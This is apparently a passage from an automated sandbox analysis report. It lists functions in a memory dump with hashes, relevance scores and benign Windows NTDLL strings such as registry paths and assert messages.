                                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                        • API String ID: 0-1757540487
                                                                        • Opcode ID: 2d33d0de909ab38f79edd7c7b8fd939adf9d63cb306f4e4bcd0a3286617be18b
                                                                        • Instruction ID: b748a74847807429204f3c7dc319eb4c78cb88705ab14ba33dc0f303df7a31be
                                                                        • Opcode Fuzzy Hash: 2d33d0de909ab38f79edd7c7b8fd939adf9d63cb306f4e4bcd0a3286617be18b
                                                                        • Instruction Fuzzy Hash: DD51D3766043169BE714DF68C844E6BB7E8BF89B15F05092EFA89D7240F734DA04C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 019AE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                        • Instruction ID: fadee3e50c9157a2b2f7ff8f9c525d63a6108d197412ec29867939e7034e857c
                                                                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                        • Instruction Fuzzy Hash: 43918F316043429FE725CE29C845B1BBBE9AFC4715F54892DF699CB280E774E908CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 019651BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
                                                                        • Opcode ID: 6a9301f9b91f793b1b25e3f95a2af17c13b8cf9b6305817aaca67a383ff27440
                                                                        • Instruction ID: cf688324e3c5a479a7c06eba18ecc9ce9ae6caf161456344f37e4c6bbac81676
                                                                        • Opcode Fuzzy Hash: 6a9301f9b91f793b1b25e3f95a2af17c13b8cf9b6305817aaca67a383ff27440
                                                                        • Instruction Fuzzy Hash: 54515E71A00619DFEB15DFA9C980EAEBBF8FF44B40F15442DE64DEB251D6719900CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0190B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0190B9A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID:
                                                                        • API String ID: 885266447-0
                                                                        • Opcode ID: d342a66e0ba1145fbca4cc04a04c78d6188a720b42d93e73e3fd173c834fec2b
                                                                        • Instruction ID: b5390e925eb39b181f40a5e1c3f20ddc7e34055d576a2095a24e534f6182f676
                                                                        • Opcode Fuzzy Hash: d342a66e0ba1145fbca4cc04a04c78d6188a720b42d93e73e3fd173c834fec2b
                                                                        • Instruction Fuzzy Hash: 6B516C75A08301CFC722CF69C08092ABBE9FB88715F54496EE59A97385D730E884CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 018EB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: _vswprintf_s
                                                                        • String ID:
                                                                        • API String ID: 677850445-0
                                                                        • Opcode ID: 7a26eb6d9c2ebc26f8988f94ee53238038726c1106adacfdb306b020d2ae369a
                                                                        • Instruction ID: 00f0c8458247485828571b61ddcab353c227e5bdc14dc0f7f784f84544f4396f
                                                                        • Opcode Fuzzy Hash: 7a26eb6d9c2ebc26f8988f94ee53238038726c1106adacfdb306b020d2ae369a
                                                                        • Instruction Fuzzy Hash: CC51FD75D0026A8BEB35CF688845FAEBBF4BF40715F2042A9D85DAB282C7304941DB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01912581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: PATH
                                                                        • API String ID: 0-1036084923
                                                                        • Opcode ID: f28aa0d71cd70959e766bb9489c60a90e7cc48bbb951cc04126fa9f772cafafe
                                                                        • Instruction ID: dbf95d760dc5feed9ef1df4068e5182907fc5bcf5a52a0639845f21fae2a1479
                                                                        • Opcode Fuzzy Hash: f28aa0d71cd70959e766bb9489c60a90e7cc48bbb951cc04126fa9f772cafafe
                                                                        • Instruction Fuzzy Hash: 1DC1B371E00219DFDB25EF99D880BBEBBB5FF48740F244429E909BB254D734A981CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0191FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0195BE0F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                        • API String ID: 0-865735534
                                                                        • Opcode ID: 65524c27aca2efcb4c82a859e8efa3cd3782180ae763237afcafe6e443efa178
                                                                        • Instruction ID: 46e524d7838cd40354de0170a648bb630ebe177daeef3ec55adbbc88dba26266
                                                                        • Opcode Fuzzy Hash: 65524c27aca2efcb4c82a859e8efa3cd3782180ae763237afcafe6e443efa178
                                                                        • Instruction Fuzzy Hash: 8CA12371B0060E8BEB25DF6CC450B7AB7A9BF48711F04456DEE0EDB684DB34D9899B80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 018E2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Re-Waiting
                                                                        • API String ID: 0-316354757
                                                                        • Opcode ID: 3c1980d3d587c95614ea263beb21f2c54b2b5feaf11d040f44a4f21270ee7959
                                                                        • Instruction ID: 5c6ef5bcd73afa90d6273beb1875a25975f4511caa9e6ebb0096507f017a2698
                                                                        • Opcode Fuzzy Hash: 3c1980d3d587c95614ea263beb21f2c54b2b5feaf11d040f44a4f21270ee7959
                                                                        • Instruction Fuzzy Hash: 1D614731E0061A9FEB32DB6CC844B7EBBEAEF85314F140669D919D72C2D7349A41C782
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 019B0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `
                                                                        • API String ID: 0-2679148245
                                                                        • Opcode ID: 6da7d07ad361d6d31c6cade71ac3ae1b64f9b022f8602792f67d45aa9529f92c
                                                                        • Instruction ID: fa80337a087c5e843c9357e01674334bc26c5c82edf510a29dd8c07ade148f1e
                                                                        • Opcode Fuzzy Hash: 6da7d07ad361d6d31c6cade71ac3ae1b64f9b022f8602792f67d45aa9529f92c
                                                                        • Instruction Fuzzy Hash: B3518C713043429BD325DF68DAD4B5BBBE9ABC4714F08092CFA8A87291D670E805C762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0191F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                        • Instruction ID: e4d83568624067491504c3fd0c02582e41516742bf290eb801bf308c6f5a108d
                                                                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                        • Instruction Fuzzy Hash: 20519C716007159FD321DF28C840A6BBBF9FF88710F00892DFA9997690E7B4E944CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01963540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryHash
                                                                        • API String ID: 0-2202222882
                                                                        • Opcode ID: a5e24a02cfdc2ad75aa93241c0d4c3fd4453dadcf59c2d433cf5f689a836f717
                                                                        • Instruction ID: 2140cb99df37ed6c424c6d7e73e9eae94fc6cd8193f97abf16785a987324d7c4
                                                                        • Opcode Fuzzy Hash: a5e24a02cfdc2ad75aa93241c0d4c3fd4453dadcf59c2d433cf5f689a836f717
                                                                        • Instruction Fuzzy Hash: F44101B1D0152DAADB21DA50CC85FAEB77CAB54714F0045A5EA0DAB241DB309F888FA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 019B05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `
                                                                        • API String ID: 0-2679148245
                                                                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                        • Instruction ID: 094d8d3476a725ad63bc0195ab5fff9048f6d8c4a9ccc16a161d863f6797952c
                                                                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                        • Instruction Fuzzy Hash: 4631B372604346ABE710DE29CE85F9B7BE9BBC4754F184229FA589B280D670E904C791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01963884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryName
                                                                        • API String ID: 0-215506332
                                                                        • Opcode ID: f35ca9f0ab4bc8663979f67feab0bcb4a022c05831446d36bd7a0daad3c73714
                                                                        • Instruction ID: 83aa04ffa85278e0f018d65a287b2de354fbdb4c3fdc8e847f494199be0cd367
                                                                        • Opcode Fuzzy Hash: f35ca9f0ab4bc8663979f67feab0bcb4a022c05831446d36bd7a0daad3c73714
                                                                        • Instruction Fuzzy Hash: FF31E832D0051AEFEB15DA58C945E6BB77CFB90720F014169E91CA7251D7309F00CBB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0191D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: fd48f685ac812849b26093eda96435e9d76d35bb90f83376596eebdad985f524
                                                                        • Instruction ID: d2d786094d4c484b01b2178325c847f57bed59140abcf6165e7f48012a4fd381
                                                                        • Opcode Fuzzy Hash: fd48f685ac812849b26093eda96435e9d76d35bb90f83376596eebdad985f524
                                                                        • Instruction Fuzzy Hash: CE31C2B15083099FC721DF68C984D6BBBE8FBD5698F000A2EF99883250D734DD45CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 018F1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: WindowsExcludedProcs
                                                                        • API String ID: 0-3583428290
                                                                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                        • Instruction ID: b5eee3fc5890f8e2bbf4a094323009912bb766d4300afaae094d521f37157930
                                                                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                        • Instruction Fuzzy Hash: 2C21C87B50112DEBDB229A998844F5B7BADEF81B51F054429FB48DB200D631DE0097A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0190F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Actx
                                                                        • API String ID: 0-89312691
                                                                        • Opcode ID: c0f6834b7b62052f3586ace096423ec05eab489e0d2e68db0469a19034f8d6e2
                                                                        • Instruction ID: 80ceba47da2984130a71ca1b447458e2322a43ead9bccee6eed6c874dd8a2cef
                                                                        • Opcode Fuzzy Hash: c0f6834b7b62052f3586ace096423ec05eab489e0d2e68db0469a19034f8d6e2
                                                                        • Instruction Fuzzy Hash: 10119335304A028FEB378E1D8490B3676DAEB95B25F24492AE56DCB3D1D7B0CA418343
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01998DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Critical error detected %lx, xrefs: 01998E21
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Critical error detected %lx
                                                                        • API String ID: 0-802127002
                                                                        • Opcode ID: e5ebb508c562db353db2dff7c4232d468b40fd7c3ba349558769967a220b25ab
                                                                        • Instruction ID: c109bc565b31a2e0a5fc38d7ff105eb07b78c1529422183ad13a095ec1042895
                                                                        • Opcode Fuzzy Hash: e5ebb508c562db353db2dff7c4232d468b40fd7c3ba349558769967a220b25ab
                                                                        • Instruction Fuzzy Hash: 1E1175B5D00348DADF28EFE88515B9CBBF4BB49311F24421EE16DAB282C3341602CF14
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0197FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0197FF60
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                        • API String ID: 0-1911121157
                                                                        • Opcode ID: 02b6bc6be80b8034dc3c062189541b39e04554b504231708388489ec65ff338a
                                                                        • Instruction ID: 8d8d4459a1445bd4a213732f753c3f4b7417e3683d9b2b6e64cd4468ca91a0ac
                                                                        • Opcode Fuzzy Hash: 02b6bc6be80b8034dc3c062189541b39e04554b504231708388489ec65ff338a
                                                                        • Instruction Fuzzy Hash: F6110471910644EFEB26DBA4C948F98BBB2FF84715F558044E10C672A1CB389990CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 019B5BA5, Relevance: .6, Instructions: 592COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6157bbb2641a7b9f71845dcb4acec0392f6258c22c1b9be25ef99ad1fc9c32e6
                                                                        • Instruction ID: 8b5b72675191959cbb9b851db269efd4ab3bddc87fba49f4b5165de3966a3fe7
                                                                        • Opcode Fuzzy Hash: 6157bbb2641a7b9f71845dcb4acec0392f6258c22c1b9be25ef99ad1fc9c32e6
                                                                        • Instruction Fuzzy Hash: 9D425A71901229CFEB24CF68C980BE9BBB5FF49305F1581AAD94DEB242D734A985CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01904120, Relevance: .4, Instructions: 444COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a66866b5b140bf96f2df5d1524c8eb9526308843acd302ab972f2cab311eb914
                                                                        • Instruction ID: 142bd26c65995f6d210f7411878f620c73d8a6bcec943216e9049be427a4579e
                                                                        • Opcode Fuzzy Hash: a66866b5b140bf96f2df5d1524c8eb9526308843acd302ab972f2cab311eb914
                                                                        • Instruction Fuzzy Hash: 76F18D706083118FC726CF19C480A7AB7E5FF98715F05492EFA8ACB291E738D995CB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 019120A0, Relevance: .4, Instructions: 420COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f8ec6bb20630f7ecd5452595effe42f2650069e0e6a624b6ada9412f1bd41e15
                                                                        • Instruction ID: 6ab9fe46afa73f050fc5a59d59964a3a4a703460b1cad82f88c312ff510dccca
                                                                        • Opcode Fuzzy Hash: f8ec6bb20630f7ecd5452595effe42f2650069e0e6a624b6ada9412f1bd41e15
                                                                        • Instruction Fuzzy Hash: F2F13A316083459FE726DF2CC440B6A7BE9BFC5324F25891DE99D9B246D734D881CB82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 018FD5E0, Relevance: .4, Instructions: 353COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6b5ef162c17b0be85c16960c32dbcd9aadc952fe84b158d4cdd47cf3ab677044
                                                                        • Instruction ID: b330c733ca37444b431ef9dfffd69593678e4a03036708ff212d61cd18c2d7e9
                                                                        • Opcode Fuzzy Hash: 6b5ef162c17b0be85c16960c32dbcd9aadc952fe84b158d4cdd47cf3ab677044
                                                                        • Instruction Fuzzy Hash: 82E1D331A0535ACFEB35CF59C880B69B7B6BF85318F04429DDB0E9B291D7349A81CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 018F849B, Relevance: .3, Instructions: 290COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6cda8693f2a08a92507e0f3f663c4a2a3fc8dca43fea79bb468ac43f9c921890
                                                                        • Instruction ID: 00926f442435e2c84bf1a44c8e5fdefe69b4be19186429d667d72cae28ee3792
                                                                        • Opcode Fuzzy Hash: 6cda8693f2a08a92507e0f3f663c4a2a3fc8dca43fea79bb468ac43f9c921890
                                                                        • Instruction Fuzzy Hash: BEB15D70E00209DFDB19DFD9C984AAEBBB9BF99308F10412DE609EB345D774AA45CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0191513A, Relevance: .3, Instructions: 258COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a5fa046b0fd3cf336b21b40231993333f081da4826c9e061b38354c04fbb3e1f
                                                                        • Instruction ID: d4d38f74b2e5d35f10a8fb96c4e2cc75fecdcc066e5261ab06dbd6744d2d1a8c
                                                                        • Opcode Fuzzy Hash: a5fa046b0fd3cf336b21b40231993333f081da4826c9e061b38354c04fbb3e1f
                                                                        • Instruction Fuzzy Hash: 6FC142755093818FE355CF28C480A5AFBF1BF89304F588A6EF9999B352D770E885CB42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 019103E2, Relevance: .3, Instructions: 254COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f3d97f0376f480e44c848347dcb68e72508ae486dc7147dfde5e938fc7d8859d
                                                                        • Instruction ID: 460069cc366651b765a1224d3cffaa09bae2602aeab70f33ee4fa70237b5bcb4
                                                                        • Opcode Fuzzy Hash: f3d97f0376f480e44c848347dcb68e72508ae486dc7147dfde5e938fc7d8859d
                                                                        • Instruction Fuzzy Hash: CC915C31E002199FEB71DB6CC844BAD7BA8AB41724F090261FE19BB2D5E734ACC0C791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 018EC600, Relevance: .2, Instructions: 225COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 04994c46be6e54f1f129dc5222f7957748743845456c2f710b8703bc29ed03e4
                                                                        • Instruction ID: b68ebd751074155a076219aa665db8c9fcb78983b063bddb6a9195e051e25684
                                                                        • Opcode Fuzzy Hash: 04994c46be6e54f1f129dc5222f7957748743845456c2f710b8703bc29ed03e4
                                                                        • Instruction Fuzzy Hash: B481A5756042418BDB6ACE98C890E7B77E9EB84354F54482EEE4DAB241D330DE44CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01966DC9, Relevance: .2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                        • Instruction ID: e47a7a3be54038ed56ea1fe1162057e084970ce80ad247bc528c606270f4bc35
                                                                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                        • Instruction Fuzzy Hash: F2717171900619EFDB15DFA8C984EEEBBB9FF88714F104469E509E7290D730EA41CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0197B8D0, Relevance: .2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa8bf9eff41dc70e6eaa12a1d09f9bbff3957d07b10cf728d154294602e384b1
                                                                        • Instruction ID: 9e37219e603556dae1b493fa634077efac6d2af94ed181689533559c21eb22a0
                                                                        • Opcode Fuzzy Hash: fa8bf9eff41dc70e6eaa12a1d09f9bbff3957d07b10cf728d154294602e384b1
                                                                        • Instruction Fuzzy Hash: 9C71F232200706AFE736EF19C845F66BBE9EF80725F144928E65E876A0DB75E940CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 018E52A5, Relevance: .2, Instructions: 161COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ec9d8a875d376fceedd65343b5bc967d00405d0147419d59b8a57a00409dc614
                                                                        • Instruction ID: 3c4abbcf3bd5a5b56d3c425e2738f6bb22ee02ec2f5ce42b902ebb76c1926be7
                                                                        • Opcode Fuzzy Hash: ec9d8a875d376fceedd65343b5bc967d00405d0147419d59b8a57a00409dc614
                                                                        • Instruction Fuzzy Hash: C951CD352053429FD722EF68C844B27BBE4FF90718F14091EF69997652E770E944C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01912AE4, Relevance: .2, Instructions: 159COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3194eb8f0c87b6fef1fab7a26fedb2fc1dc72b3a9fa529bf37e826757315d98f
                                                                        • Instruction ID: 1cd91b74cde5a0bad8de937ea860cb427a6193e4676c13e5f788dbf6551833e9
                                                                        • Opcode Fuzzy Hash: 3194eb8f0c87b6fef1fab7a26fedb2fc1dc72b3a9fa529bf37e826757315d98f
                                                                        • Instruction Fuzzy Hash: C451C576B00119CFCB15DF1CC8809BDB7F1FB89700725845AE95A9B369D730AAD1CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 019AAE44, Relevance: .2, Instructions: 152COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d5ebdcb1f6a012ab48c84fd25f98f6227f2a483517949c20f290735b1d7d26fc
                                                                        • Instruction ID: 5850b3ee9615a1beb62e6db5363314ca4336e91707583e6ee06288d312f065b3
                                                                        • Opcode Fuzzy Hash: d5ebdcb1f6a012ab48c84fd25f98f6227f2a483517949c20f290735b1d7d26fc
                                                                        • Instruction Fuzzy Hash: B241F4717002115BD72A9A29C894B3BB79DEF84621F944619FA1E872D0DB34E809C6D1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0190DBE9, Relevance: .1, Instructions: 149COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 034c910ad39690bb7c4d068c48d97d208a8320cad082aaa70f0c20cd04a36690
                                                                        • Instruction ID: cec8723bf4f967786a49fd372f898f613d3663194a1bff8fb19aa6285ce96688
                                                                        • Opcode Fuzzy Hash: 034c910ad39690bb7c4d068c48d97d208a8320cad082aaa70f0c20cd04a36690
                                                                        • Instruction Fuzzy Hash: 5B519175E01616DFCB16CFE8C480A9EBBF5BB48310F24855AD959E7385DB30AA84CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 018FEF40, Relevance: .1, Instructions: 147COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
